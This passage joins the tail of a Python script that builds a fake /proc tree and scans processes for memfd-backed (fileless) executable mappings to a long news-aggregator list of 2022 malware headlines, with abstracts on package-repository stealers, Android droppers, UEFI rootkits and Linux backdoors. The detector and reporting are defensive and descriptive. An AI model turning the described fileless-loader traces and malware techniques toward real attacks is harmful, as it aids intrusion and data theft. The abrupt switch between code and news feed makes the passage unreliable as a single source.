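                 "7ffd-7ffe r--p 00000000 00:00 0 [vvar]\n"),
        # on-disk interpreter that has mapped a memfd payload
        "777": ("/usr/bin/python3",
                "5600-5610 r-xp 00000000 08:01 4321 /usr/bin/python3\n"
                "7f10-7f20 rwxp 00000000 00:01 100 /memfd:loader (deleted)\n"),
    }
    for pid, (exe, maps) in samples.items():
        pid_dir = os.path.join(root, pid)
        os.makedirs(pid_dir)
        os.symlink(exe, os.path.join(pid_dir, "exe"))   # dangling link is fine
        with open(os.path.join(pid_dir, "maps"), "w") as fh:
            fh.write(maps)
    return root


if __name__ == "__main__":
    for f in scan_proc():          # real /proc; run as root for full coverage
        print(f"pid {f.pid}: exe={f.exe_target} memfd={f.memfd_name} "
              f"mappings={f.memfd_mappings}")
```

Reading another user's /proc/<pid>/exe needs the same UID or CAP_SYS_PTRACE, so run the scan as root. memfd is also used legitimately (shared-memory IPC, some runtimes and sandboxes), so a hit is a triage signal to pair with parent process, network activity and CPU usage rather than something to kill on sight; the package's own cleanup described above means the on-disk dropper may already be gone by the time you look.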
August 13, 2022
SOVA malware adds ransomware feature to encrypt Android devices Full Text
Abstract
The SOVA Android banking trojan continues to evolve with new features, code improvements, and the addition of a new ransomware feature that encrypts files on mobile devices.BleepingComputer
August 12, 2022
Chinese hackers backdoor chat app with new Linux, macOS malware Full Text
Abstract
Versions of a cross-platform instant messenger application focused on the Chinese market known as 'MiMi' have been trojanized to deliver a new backdoor (dubbed rshell) that can be used to steal data from Linux and macOS systems.BleepingComputer
August 12, 2022
Microsoft blocks UEFI bootloaders enabling Windows Secure Boot bypass Full Text
Abstract
Some signed third-party bootloaders for the Unified Extensible Firmware Interface (UEFI) used by Windows could allow attackers to execute unauthorized code in an early stage of the boot process, before the operating system loads.BleepingComputer
August 10, 2022
Experts found 10 malicious packages on PyPI used to steal developers’ data Full Text
Abstract
10 packages have been removed from the Python Package Index (PyPI) because they were found harvesting data. Check Point researchers have discovered ten malicious packages on the Python Package Index (PyPI). The packages install info-stealers that...Security Affairs
August 9, 2022
Woody RAT Targets Russian Entities Full Text
Abstract
The malware was being delivered via archive files and MS Office documents by abusing the Follina vulnerability. The malware has been active in the wild for at least a year.Cyware Alerts - Hacker News
August 09, 2022
10 Credential Stealing Python Libraries Found on PyPI Repository Full Text
Abstract
In what's yet another instance of malicious packages creeping into public code repositories, 10 modules have been removed from the Python Package Index (PyPI) for their ability to harvest critical data points such as passwords and API tokens. The packages "install info-stealers that enable attackers to steal developer's private data and personal credentials," Israeli cybersecurity firm Check Point said in a Monday report. A short summary of the offending packages is below: Ascii2text, which downloads a nefarious script that gathers passwords stored in web browsers such as Google Chrome, Microsoft Edge, Brave, Opera, and Yandex Browser; Pyg-utils, Pymocks, and PyProto2, which are designed to steal users' AWS credentials; Test-async and Zlibsrc, which download and execute malicious code during installation; Free-net-vpn, Free-net-vpn2, and WINRPCexploit, which steal user credentials and environment variables; and Browserdiv, which are capable of coll...The Hacker News
August 09, 2022
10 malicious PyPI packages found stealing developer’s credentials Full Text
Abstract
Threat analysts have discovered ten malicious Python packages on the PyPI repository, used to infect developer's systems with password-stealing malware.BleepingComputer
August 09, 2022
Hackers install Dracarys Android malware using modified Signal app Full Text
Abstract
Researchers have discovered more details on the newly discovered Android spyware 'Dracarys,' used by the Bitter APT group in cyberespionage operations targeting users from New Zealand, India, Pakistan, and the United Kingdom.BleepingComputer
August 5, 2022
The popularity of Dark Utilities ‘C2-as-a-Service’ rapidly increases Full Text
Abstract
Dark Utilities "C2-as-a-Service" is attracting a growing number of customers searching for a command-and-control for their campaigns. The popularity of the Dark Utilities "C2-as-a-Service" is rapidly increasing, over 3,000 users are already...Security Affairs
August 5, 2022
A Bunch of Android Apps Spread Adware and Other Malware Full Text
Abstract
Another batch of malicious apps infected with adware and malware has managed to slip past Google's defenses and end up on the Play Store. These apps were pushing intrusive ads, subscribing users to premium services, and stealing social media accounts. Users are requested to verify apps beforehand...Cyware Alerts - Hacker News
August 4, 2022
Microsoft links Raspberry Robin Malware to Evil Corp Attacks Full Text
Abstract
Microsoft has interlinked the operations of cybercriminals spreading Raspberry Robin and the notorious Evil Corp. Evil Corp (tracked by Microsoft as DEV-0243) was seen taking advantage of access to enterprise networks gained through Raspberry Robin infections to distribute Dridex malware. Raspberry Robin spreads via external USB drives.Cyware Alerts - Hacker News
August 4, 2022
IcedID leverages PrivateLoader. By: Joshua Platt and Jason Reaves Full Text
Abstract
PrivateLoader is no stranger to being used by bigger malware names: previous research indicates it has been leveraged by TrickBot, Qakbot, DanaBot, and Dridex.Medium
August 04, 2022
New Linux malware brute-forces SSH servers to breach networks Full Text
Abstract
A new botnet called 'RapperBot' has emerged in the wild since mid-June 2022, focusing on brute-forcing its way into Linux SSH servers and then establishing persistence.BleepingComputer
August 04, 2022
Cybersecurity agencies reveal last year’s top malware strains Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a list of the topmost detected malware strains last year in a joint advisory with the Australian Cyber Security Centre (ACSC).BleepingComputer
August 03, 2022
Cloned Atomic Wallet website is pushing Mars Stealer malware Full Text
Abstract
A fake website impersonating the official portal for the Atomic wallet, a popular decentralized wallet that also operates as a cryptocurrency exchange portal, is, in reality, distributing copies of the Mars Stealer information-stealing malware.BleepingComputer
August 03, 2022
VirusTotal Reveals Most Impersonated Software in Malware Attacks Full Text
Abstract
Threat actors are increasingly mimicking legitimate applications like Skype, Adobe Reader, and VLC Player as a means to abuse trust relationships and increase the likelihood of a successful social engineering attack. Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed. "One of the simplest social engineering tricks we've seen involves making a malware sample seem a legitimate program," VirusTotal said in a Tuesday report. "The icon of these programs is a critical feature used to convince victims that these programs are legitimate." It's no surprise that threat actors resort to a variety of approaches to compromise endpoints by tricking unwitting users into downloading and running seemingly innocuous executables. This, in turn, is primarily achieved by taking advantage of genuine domains in a bid to get around IP-based firewall defensesThe Hacker News
August 3, 2022
Manjusaka, a new attack tool similar to Sliver and Cobalt Strike Full Text
Abstract
Researchers spotted a Chinese threat actor using a new offensive framework called Manjusaka, which is similar to Cobalt Strike. Talos researchers observed a Chinese threat actor using a new offensive framework called Manjusaka (which can be translated...Security Affairs
August 03, 2022
35,000 code repos not hacked—but clones flood GitHub to serve malware Full Text
Abstract
Thousands of GitHub repositories were forked (cloned) and altered to include malware, a software engineer discovered.BleepingComputer
August 2, 2022
Gootkit AaaS malware is still active and uses updated tactics Full Text
Abstract
Gootkit access-as-a-service (AaaS) malware is back with updated tactics and fileless delivery of Cobalt Strike beacons. Gootkit runs on an access-as-a-service model; it is used by different groups to drop additional malicious payloads on the compromised...Security Affairs
August 1, 2022
Latest Generation of the Raccoon Stealer Family Ditches Telegram Network for Command & Control Full Text
Abstract
Raccoon is a malware family that has been sold as malware-as-a-service on underground forums since early 2019. In early July 2022, a new variant of this malware dubbed Raccoon Stealer v2 was released.Zscaler
July 31, 2022
Gootkit Loader Resurfaces with Updated Tactic to Compromise Targeted Computers Full Text
Abstract
The operators of the Gootkit access-as-a-service (AaaS) malware have resurfaced with updated techniques to compromise unsuspecting victims. "In the past, Gootkit used freeware installers to mask malicious files; now it uses legal documents to trick users into downloading these files," Trend Micro researchers Buddy Tancio and Jed Valderama said in a write-up last week. The findings build on a previous report from eSentire, which in January disclosed widespread attacks aimed at employees of accounting and law firms to deploy malware on infected systems. Gootkit is part of the proliferating underground ecosystem of access brokers, who are known to provide other malicious actors a pathway into corporate networks for a price, paving the way for actual damaging attacks such as ransomware. The loader utilizes malicious search engine results, a technique called SEO poisoning, to lure unsuspecting users into visiting compromised websites hosting malware-laced ZIP pacThe Hacker News
July 31, 2022
IIS Extensions Used as Backdoors for Exchange Servers Full Text
Abstract
Microsoft warned against threat actors increasingly using malicious IIS web server extensions to backdoor unpatched Exchange servers. Between January and May, the attackers targeted several servers to access victims' email mailboxes, steal credentials and sensitive data, and run commands. IIS modul ...Cyware Alerts - Hacker News
July 31, 2022
DSIRF, Knotweed Jointly Abused Zero-day to Deploy Subzero Malware Full Text
Abstract
Microsoft connected the Knotweed threat actor to the Austrian surveillance firm DSIRF that has been targeting entities in Central America and Europe with the Subzero surveillance malware. Microsoft recommends patching the exploited flaws and confirming that Microsoft Defender is updated to det ...Cyware Alerts - Hacker News
July 31, 2022
17 Android Apps on Google Play Store, dubbed DawDropper, were serving banking malware Full Text
Abstract
The researchers discovered over a dozen Android apps on the Google Play Store, collectively dubbed DawDropper, that were dropping banking malware. Trend Micro researchers uncovered a malicious campaign that leveraged 17 seemingly harmless Android dropper...Security Affairs
July 29, 2022
Over a Dozen Android Apps on Google Play Store Caught Dropping Banking Malware Full Text
Abstract
A malicious campaign leveraged seemingly innocuous Android dropper apps on the Google Play Store to compromise users' devices with banking malware. These 17 dropper apps, collectively dubbed DawDropper by Trend Micro, masqueraded as productivity and utility apps such as document scanners, QR code readers, VPN services, and call recorders, among others. All these apps in question have been removed from the app marketplace. "DawDropper uses Firebase Realtime Database, a third-party cloud service, to evade detection and dynamically obtain a payload download address," the researchers said. "It also hosts malicious payloads on GitHub." Droppers are apps designed to sneak past Google's Play Store security checks, following which they are used to download more potent and intrusive malware on a device, in this case, Octo (Coper), Hydra, Ermac, and TeaBot. Attack chains involved the DawDropper malware establishing connections with a Firebase ReThe Hacker News
July 29, 2022
Microsoft experts linked the Raspberry Robin malware to Evil Corp operation Full Text
Abstract
Microsoft linked the recently discovered Raspberry Robin Windows malware to the notorious Evil Corp operation. On July 26, 2022, Microsoft researchers discovered that the FakeUpdates malware was being distributed via Raspberry Robin malware. Raspberry...Security Affairs
July 29, 2022
Malware-laced npm packages used to target Discord users Full Text
Abstract
Threat actors used multiple npm packages to target Discord users with malware designed to steal their payment card data. A malicious campaign targeting Discord users leverages multiple npm packages to deliver malware that steals their payment card...Security Affairs
July 28, 2022
Amadey Bot’s New Version Spreads Using Software Cracks Full Text
Abstract
Software cracks and keygen sites may be attractive, but they are extremely unsafe. A malware campaign by SmokeLoader operators was spotted dropping the Amadey Bot, a malware rarely seen since 2020, via similar lures. Users should avoid downloading from unauthenticated sources and double check dom ...Cyware Alerts - Hacker News
July 28, 2022
Cyberspies use Google Chrome extension to steal emails undetected Full Text
Abstract
A North Korean-backed threat group tracked as Kimsuky is using a malicious browser extension to steal emails from Google Chrome or Microsoft Edge users reading their webmail.BleepingComputer
July 28, 2022
Malicious npm packages steal Discord users’ payment card info Full Text
Abstract
Multiple npm packages are being used in an ongoing malicious campaign to infect Discord users with malware that steals their payment card information.BleepingComputer
July 27, 2022
These 28+ Android Apps with 10 Million Downloads from the Play Store Contain Malware Full Text
Abstract
As many as 30 malicious Android apps with cumulative downloads of nearly 10 million have been found on the Google Play Store distributing adware. "All of them were built into various programs, including image-editing software, virtual keyboards, system tools and utilities, calling apps, wallpaper collection apps, and others," Dr.Web said in a Tuesday write-up. While masquerading as innocuous apps, their primary goal is to request permissions to show windows over other apps and run in the background in order to serve intrusive ads. To make it difficult for the victims to detect and uninstall the apps, the adware trojans hide their icons from the list of installed apps in the home screen or replace the icons with others that are likely to be less noticed (e.g., SIM Toolkit). Some of these apps also offer the advertised features, as observed in the case of two apps: "Water Reminder- Tracker & Reminder" and "Yoga- For Beginner to Advanced." HoweverThe Hacker News
July 27, 2022
New Ducktail Infostealer Malware Targeting Facebook Business and Ad Accounts Full Text
Abstract
Facebook business and advertising accounts are at the receiving end of an ongoing campaign dubbed Ducktail designed to seize control as part of a financially driven cybercriminal operation. "The threat actor targets individuals and employees that may have access to a Facebook Business account with an information-stealer malware," Finnish cybersecurity company WithSecure (formerly F-Secure Business) said in a new report. "The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim's Facebook account and ultimately hijack any Facebook Business account that the victim has sufficient access to." The attacks, attributed to a Vietnamese threat actor, are said to have begun in the latter half of 2021, with primary targets being individuals with managerial, digital marketing, digital media, and human resources roles in companies. The idea is to target employees with high-level accThe Hacker News
July 27, 2022
Microsoft: Windows, Adobe zero-days used to deploy Subzero malware Full Text
Abstract
Microsoft has linked a threat group known as Knotweed to an Austrian spyware vendor also operating as a cyber mercenary outfit named DSIRF that targets European and Central American entities using a malware toolset dubbed Subzero.BleepingComputer
July 27, 2022
Malicious IIS Extensions Gaining Popularity Among Cyber Criminals for Persistent Access Full Text
Abstract
Threat actors are increasingly abusing Internet Information Services (IIS) extensions to backdoor servers as a means of establishing a "durable persistence mechanism." That's according to a new warning from the Microsoft 365 Defender Research Team, which said that "IIS backdoors are also harder to detect since they mostly reside in the same directories as legitimate modules used by target applications, and they follow the same code structure as clean modules." Attack chains taking this approach commence with weaponizing a critical vulnerability in the hosted application for initial access, using this foothold to drop a script web shell as the first stage payload. This web shell then becomes the conduit for installing a rogue IIS module to provide highly covert and persistent access to the server, in addition to monitoring incoming and outgoing requests as well as running remote commands. Indeed, earlier this month, Kaspersky researchers disclosed a camThe Hacker News
July 26, 2022
Lightning Framework: Another Capable Linux Malware Full Text
Abstract
A previously undetected malware, dubbed Lightning Framework, was found targeting Linux systems. It can also serve as a backdoor for infected devices using SSH and can deploy an array of rootkits. Stay safe using a reliable anti-malware solution, and don't skip on threat intel platforms to mitiga ...Cyware Alerts - Hacker News
July 26, 2022
Threat actors leverage DLL side-loading to spread Qakbot malware Full Text
Abstract
Qakbot malware operators are using the Windows Calculator to side-load the malicious payload on target systems. Security expert ProxyLife and Cyble researchers recently uncovered a Qakbot campaign that was leveraging the Windows 7 Calculator app for DLL side-loading...Security Affairs
July 26, 2022
New Android malware apps installed 10 million times from Google Play Full Text
Abstract
A new batch of malicious Android apps filled with adware and malware was found on the Google Play Store; the apps have been installed close to 10 million times on mobile devices.BleepingComputer
July 26, 2022
GoMet Backdoor Used in Attacks Targeting Ukraine Full Text
Abstract
An uncommon piece of malware was found targeting a large software development firm in Ukraine. The malware is a moderately altered version of the open-source backdoor GoMet. Two samples of the backdoor with minor differences have been discovered, believed to have the same source code. However ...Cyware Alerts - Hacker News
July 26, 2022
SmokeLoader Infecting Targeted Systems with Amadey Info-Stealing Malware Full Text
Abstract
An information-stealing malware called Amadey is being distributed by means of another backdoor called SmokeLoader. The attacks hinge on tricking users into downloading SmokeLoader that masquerades as software cracks, paving the way for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last week. Amadey, a botnet that first appeared around October 2018 on Russian underground forums for $600, is equipped to siphon credentials, capture screenshots, system metadata, and even information about antivirus engines and additional malware installed on an infected machine. While an update spotted last July by Walmart Global Tech incorporated functionality for harvesting data from Mikrotik routers and Microsoft Outlook, the toolset has since been upgraded to capture information from FileZilla, Pidgin, Total Commander FTP Client, RealVNC, TightVNC, TigerVNC, and WinSCP. Its main goal, however, is to deployThe Hacker News
July 25, 2022
CosmicStrand UEFI malware found in Gigabyte, ASUS motherboards Full Text
Abstract
Chinese-speaking hackers have, since at least 2016, been using malware that lies virtually undetected in the firmware images of some motherboards, one of the most persistent kinds of threat, commonly known as a UEFI rootkit.BleepingComputer
July 25, 2022
Source code for Rust-based info-stealer released on hacker forums Full Text
Abstract
A malware author released the source code of their info-stealer for free on hacking forums earlier this month, and security analysts already report observing several samples being deployed in the wild.BleepingComputer
July 25, 2022
CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China Full Text
Abstract
Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor. Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed...Security Affairs
July 25, 2022
Experts Uncover New ‘CosmicStrand’ UEFI Firmware Rootkit Used by Chinese Hackers Full Text
Abstract
An unknown Chinese-speaking threat actor has been attributed to a new kind of sophisticated UEFI firmware rootkit called CosmicStrand. "The rootkit is located in the firmware images of Gigabyte or ASUS motherboards, and we noticed that all these images are related to designs using the H81 chipset," Kaspersky researchers said in a new report published today. "This suggests that a common vulnerability may exist that allowed the attackers to inject their rootkit into the firmware's image." Victims identified are said to be private individuals located in China, Vietnam, Iran, and Russia, with no discernible ties to any organization or industry vertical. The attribution to a Chinese-speaking threat actor stems from code overlaps between CosmicStrand and other malware such as the MyKings botnet and MoonBounce. Rootkits, which are malware implants that are capable of embedding themselves in the deepest layers of the operating system, are morphed from a rarity tThe Hacker News
July 25, 2022
Racoon Stealer is Back — How to Protect Your Organization Full Text
Abstract
The Racoon Stealer malware-as-a-service platform gained notoriety several years ago for its ability to extract data that is stored within a web browser. This data initially included passwords and cookies, which sometimes allow a recognized device to be authenticated without a password being entered. Racoon Stealer was also designed to steal auto-fill data, which can include a vast trove of personal information ranging from basic contact data to credit card numbers. As if all of that were not enough, Racoon Stealer also had the ability to steal cryptocurrency and to steal (or drop) files on an infected system. As bad as Racoon Stealer might have been, its developers have recently created a new version that is designed to be far more damaging than the version that previously existed. New Racoon Stealer Capabilities: The new version of Raccoon Stealer still has the ability to steal browser passwords, cookies, and auto-fill data. It also has the ability to steal any credit card numbeThe Hacker News
July 25, 2022
Amadey malware spreads via software cracks laced with SmokeLoader Full Text
Abstract
Operators behind the Amadey Bot malware use SmokeLoader to distribute a new variant via software cracks and keygen sites. Amadey Bot is a data-stealing malware that was first spotted in 2018; it also allows operators to install additional payloads....Security Affairs
July 24, 2022
Amadey malware pushed via software cracks in SmokeLoader campaign Full Text
Abstract
A new version of the Amadey Bot malware is distributed through the SmokeLoader malware, using software cracks and keygen sites as lures.BleepingComputer
July 21, 2022
New Linux Malware Framework Lets Attackers Install Rootkit on Targeted Systems Full Text
Abstract
A never-before-seen Linux malware has been dubbed a "Swiss Army Knife" for its modular architecture and its capability to install rootkits. This previously undetected Linux threat, called Lightning Framework by Intezer, is equipped with a plethora of features, making it one of the most intricate frameworks developed for targeting Linux systems. "The framework has both passive and active capabilities for communication with the threat actor, including opening up SSH on an infected machine, and a polymorphic malleable command and control configuration," Intezer researcher Ryan Robinson said in a new report published today. Central to the malware is a downloader ("kbioset") and a core ("kkdmflush") module, the former of which is engineered to retrieve at least seven different plugins from a remote server that are subsequently invoked by the core component. In addition, the downloader is also responsible for establishing the persistence of tThe Hacker News
July 21, 2022
Google ads lead to major malvertising campaign Full Text
Abstract
What makes this campaign stand out is the fact that it exploits a very common search behavior when it comes to navigating the web: looking up a website by name instead of entering its full URL in the address bar.Malwarebytes Labs
July 21, 2022
Lightning Framework, a previously undetected malware that targets Linux systems Full Text
Abstract
Researchers discovered a previously undetected malware dubbed 'Lightning Framework' that targets Linux systems. Researchers from Intezer discovered a previously undetected malware, tracked as Lightning Framework, which targets Linux systems. The malicious...Security Affairs
July 21, 2022
New ‘Lightning Framework’ Linux malware installs rootkits, backdoors Full Text
Abstract
A new and previously undetected malware dubbed 'Lightning Framework' targets Linux systems and can be used to backdoor infected devices using SSH and deploy multiple types of rootkits.BleepingComputer
July 21, 2022
EvilNum Malware Used to Target Entities Working with Cryptocurrency, Forex, Commodities Full Text
Abstract
TA4563 is a threat actor leveraging EvilNum malware to target European financial and investment entities, especially those with operations supporting foreign exchanges, cryptocurrency, and decentralized finance (DeFi).Proof Point
July 20, 2022
U.S. Cyber Command Exposes Malware Targeting Ukrainian Entities Full Text
Abstract
Ukrainian officials shared the information with the U.S. government, Cyber Command said, and then the agency uploaded various technical details to VirusTotal, Pastebin and GitHub. The agency did not attribute the malware.CyberScoop
July 19, 2022
Experts Uncover New CloudMensis Spyware Targeting Apple macOS Users Full Text
Abstract
Cybersecurity researchers have taken the wraps off a previously undocumented spyware targeting the Apple macOS operating system. The malware, codenamed CloudMensis by Slovak cybersecurity firm ESET, is said to exclusively use public cloud storage services such as pCloud, Yandex Disk, and Dropbox for receiving attacker commands and exfiltrating files. "Its capabilities clearly show that the intent of its operators is to gather information from the victims' Macs by exfiltrating documents, keystrokes, and screen captures," ESET researcher Marc-Etienne M.Léveillé said in a report published today. CloudMensis, written in Objective-C, was first discovered in April 2022 and is designed to strike both Intel and Apple silicon architectures. The initial infection vector for the attacks and the targets remain unknown as yet. But its very limited distribution is an indication that the malware is being used as part of a highly targeted operation directed against entities of iThe Hacker News
July 19, 2022
Several apps on the Play Store used to spread Joker, Facestealer and Coper malware Full Text
Abstract
Google blocked dozens of malicious apps from the official Play Store that were spreading Joker, Facestealer, and Coper malware families. Google has removed dozens of malicious apps from the official Play Store that were distributing Joker, Facestealer,...Security Affairs
July 19, 2022
Malicious Android apps with 300K installs found on Google Play Full Text
Abstract
Cybersecurity researchers have discovered three Android malware families infiltrating the Google Play Store, hiding their malicious payloads inside many seemingly innocuous applications.BleepingComputer
July 19, 2022
New CloudMensis malware backdoors Macs to steal victims’ data Full Text
Abstract
Unknown threat actors are using previously undetected malware to backdoor macOS devices and exfiltrate information in a highly targeted series of attacks.BleepingComputer
July 18, 2022
Several New Play Store Apps Spotted Distributing Joker, Facestealer and Coper Malware Full Text
Abstract
Google has taken steps to ax dozens of fraudulent apps from the official Play Store that were spotted propagating Joker, Facestealer, and Coper malware families through the virtual marketplace. While the Android storefront is considered to be a trusted source for discovering and installing apps, bad actors have repeatedly found ways to sneak past security barriers erected by Google in hopes of luring unsuspecting users into downloading malware-laced apps. The latest findings from Zscaler ThreatLabz and Pradeo are no different. "Joker is one of the most prominent malware families targeting Android devices," researchers Viral Gandhi and Himanshu Sharma said in a Monday report. "Despite public awareness of this particular malware, it keeps finding its way into Google's official app store by regularly modifying the malware's trace signatures including updates to the code, execution methods, and payload-retrieving techniques." Categorized as fleecewaThe Hacker News
July 18, 2022
MLNK Builder 4.2 released in Dark Web – malicious shortcut-based attacks are on the rise Full Text
Abstract
Cybercriminals released a new MLNK Builder 4.2 tool for generating malicious shortcuts (LNK) with an improved PowerShell and VBS obfuscator. Resecurity, Inc. (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 worldwide, has detected...Security Affairs
July 17, 2022
WhatsApp Warns Users of Fake App Versions Full Text
Abstract
WhatsApp’s CEO has issued a strict warning to Android users about fake versions of the messaging app attempting to steal personal information stored on victims’ phones. A Twitter thread by the CEO revealed a fake Android app called 'Hey WhatsApp' being sold as a premium WhatsApp version. WhatsApp r ...Cyware Alerts - Hacker News
July 15, 2022
Password recovery tool infects industrial systems with Sality malware Full Text
Abstract
A threat actor is infecting industrial control systems (ICS) to create a botnet through password "cracking" software for programmable logic controllers (PLCs).BleepingComputer
July 14, 2022
PayPal-themed phishing kit allows complete identity theft Full Text
Abstract
The phishing kit leads users through a set of pages aimed at collecting information that can later be used to steal the victims’ identity and perform money laundering, open cryptocurrency accounts, make fraudulent tax return claims, and much more.Help Net Security
July 14, 2022
WhatsApp warns users of fake versions of the app trying to steal personal information Full Text
Abstract
Google Play Protect on Android now detects and disables previously downloaded versions of the fake WhatsApp apps, and the Google Play store shouldn’t experience any threat from these apps.Malwarebytes Labs
July 13, 2022
New Android malware on Google Play installed 3 million times Full Text
Abstract
A new Android malware family on the Google Play Store that secretly subscribes users to premium services was downloaded over 3,000,000 times.BleepingComputer
July 13, 2022
Researchers Uncover New Variants of the ChromeLoader Browser Hijacking Malware Full Text
Abstract
Cybersecurity researchers have uncovered new variants of the ChromeLoader information-stealing malware, highlighting its evolving feature set in a short span of time. Primarily used for hijacking victims' browser searches and presenting advertisements, ChromeLoader came to light in January 2022 and has been distributed in the form of ISO or DMG file downloads advertised via QR codes on Twitter and free gaming sites. ChromeLoader has also been codenamed Choziosi Loader and ChromeBack by the broader cybersecurity community. What makes the adware notable is that it's fashioned as a browser extension as opposed to a Windows executable (.exe) or Dynamic Link Library (.dll). The infections typically work by enticing unsuspecting users into downloading movie torrents or cracked video games through malvertising campaigns on pay-per-install sites and social media. Besides requesting invasive permissions to access browser data and manipulate web requests, it's also designed tThe Hacker News
July 12, 2022
Researchers Uncover New Attempts by Qakbot Malware to Evade Detection Full Text
Abstract
The operators behind the Qakbot malware are transforming their delivery vectors in an attempt to sidestep detection. "Most recently, threat actors have transformed their techniques to evade detection by using ZIP file extensions, enticing file names with common formats, and Excel (XLM) 4.0 to trick victims into downloading malicious attachments that install Qakbot," Zscaler Threatlabz researchers Tarun Dewan and Aditya Sharma said. Other methods adopted by the group include code obfuscation, introducing new layers in the attack chain from initial compromise to execution, and using multiple URLs as well as unknown file extensions (e.g., .OCX, .ooccxx, .dat, or .gyp) to deliver the payload. Also called QBot, QuackBot, or Pinkslipbot, Qakbot has been a recurring threat since late 2007, evolving from its initial days as a banking trojan to a modular information stealer capable of deploying next-stage payloads such as ransomware. "Qakbot is a flexible post-exploiThe Hacker News
July 11, 2022
PennyWise Targets Cryptocurrency Wallets Using YouTube Full Text
Abstract
The new PennyWise infostealer can target over 30 browsers and cryptocurrency apps, including crypto browser extensions and cold crypto wallets. It pretends to be a Bitcoin mining app on YouTube. The malware detects a browser and extracts information saved on it, including login credentials, cookies ...Cyware Alerts - Hacker News
July 9, 2022
Rozena backdoor delivered by exploiting the Follina bug Full Text
Abstract
Threat actors are exploiting the disclosed Follina Windows vulnerability to distribute the Rozena backdoor. Fortinet FortiGuard Labs researchers observed a phishing campaign that is leveraging the recently disclosed Follina security vulnerability...Security Affairs
July 08, 2022
Researchers Warn of Raspberry Robin’s Worm Targeting Windows Users Full Text
Abstract
Cybersecurity researchers are drawing attention to an ongoing wave of attacks linked to a threat cluster tracked as Raspberry Robin that's behind a Windows malware with worm-like capabilities. Describing it as a "persistent" and "spreading" threat, Cybereason said it observed a number of victims in Europe. The infections involve a worm that propagates over removable USB devices containing a malicious .LNK file and leverages compromised QNAP network-attached storage (NAS) devices for command-and-control. It was first documented by researchers from Red Canary in May 2022. Also codenamed QNAP worm by Sekoia, the malware leverages a legitimate Windows installer binary called "msiexec.exe" to download and execute a malicious shared library (DLL) from a compromised QNAP NAS appliance. "To make it harder to detect, Raspberry Robin leverages process injections in three legitimate Windows system processes," Cybereason researcher Loïc CastThe Hacker News
July 8, 2022
PyPI Packages Steal Telegram Cache Files, Add Windows Remote Desktop Accounts Full Text
Abstract
The primary packages of interest are flask-requests-complex, php-requests-complex, and tkinter-message-box. The first two packages contain no description but are certainly named after the popular 'requests' module.Sonatype
July 08, 2022
Experts Uncover 350 Browser Extension Variants Used in ABCsoup Adware Campaign Full Text
Abstract
A malicious browser extension with 350 variants is masquerading as a Google Translate add-on as part of an adware campaign targeting Russian users of Google Chrome, Opera, and Mozilla Firefox browsers. Mobile security firm Zimperium dubbed the malware family ABCsoup, stating the "extensions are installed onto a victim's machine via a Windows-based executable, bypassing most endpoint security solutions, along with the security controls found in the official extension stores." The rogue browser add-ons come with the same extension ID as that of Google Translate — "aapbdbdomjkkjkaonfhkkikfgjllcleb" — in an attempt to trick users into believing that they have installed a legitimate extension. The extensions are not available on the official browser web stores themselves. Rather they are delivered through different Windows executables that install the add-on on the victim's web browser. In the event the targeted user already has the Google Translate extThe Hacker News
July 8, 2022
Notable Droppers Emerge in Recent Threat Campaigns Full Text
Abstract
Researchers captured three different samples active in the threat campaign. The first sample is an Excel file with Excel 4.0 macros. The second is an LNK file (Windows shortcut file). The third sample is an ISO file (optical disk image).Fortinet
July 7, 2022
Large-scale cryptomining campaign is targeting the NPM JavaScript package repository Full Text
Abstract
Researchers uncovered a large-scale cryptocurrency mining campaign targeting the NPM JavaScript package repository. Checkmarx researchers spotted a new large-scale cryptocurrency mining campaign, tracked as CuteBoi, that is targeting the NPM JavaScript...Security Affairs
July 07, 2022
Over 1200 NPM Packages Found Involved in “CuteBoi” Cryptomining Campaign Full Text
Abstract
Researchers have disclosed a new large-scale cryptocurrency mining campaign targeting the NPM JavaScript package repository. The malicious activity, attributed to a software supply chain threat actor dubbed CuteBoi , involves an array of 1,283 rogue modules that were published in an automated fashion from over 1,000 different user accounts. "This was done using automation which includes the ability to pass the NPM 2FA challenge," Israeli application security testing company Checkmarx said . "This cluster of packages seems to be a part of an attacker experimenting at this point." All the released packages in question are said to harbor near-identical source code from an already existing package named eazyminer that's used to mine Monero by means of utilizing unused resources on web servers. One notable modification entails the URL to which the mined cryptocurrency should be sent, although installing the rogue modules will not bring about a negative effectThe Hacker News
July 07, 2022
New stealthy OrBit malware steals data from Linux devices Full Text
Abstract
A newly discovered Linux malware is being used to stealthily steal information from backdoored Linux systems and infect all running processes on the machine.BleepingComputer
July 7, 2022
OrBit, a new sophisticated Linux malware still undetected Full Text
Abstract
Cybersecurity researchers warn of new malware, tracked as OrBit, which is a fully undetected Linux threat. Cybersecurity researchers at Intezer have uncovered a new Linux malware, tracked as OrBit, that is still undetected. The malware can be installed...Security Affairs
July 06, 2022
Researchers Warn of New OrBit Linux Malware That Hijacks Execution Flow Full Text
Abstract
Cybersecurity researchers have taken the wraps off a new and entirely undetected Linux threat dubbed OrBit , signaling a growing trend of malware attacks geared towards the popular operating system. The malware gets its name from one of the filenames that's utilized to temporarily store the output of executed commands ("/tmp/.orbit"), according to cybersecurity firm Intezer. "It can be installed either with persistence capabilities or as a volatile implant," security researcher Nicole Fishbein said . "The malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands." OrBit is the fourth Linux malware to have come to light in a short span of three months after BPFDoor , Symbiote , and Syslogk . The malware also functions a lot like Symbiote in that it's designed to infect all of tThe Hacker News
July 6, 2022
Toll Fraud Malware Catching Up Quickly, Microsoft Warns Full Text
Abstract
Microsoft warned of the toll fraud malware threat that targets Android users to drain their wallets by automatically subscribing them to premium services. Toll fraud works over Wireless Application Protocol (WAP) that allows consumers to subscribe to paid content. To stay protected from toll fraud ... Cyware Alerts - Hacker News
July 6, 2022
Near-undetectable malware linked to Russia’s Cozy Bear Full Text
Abstract
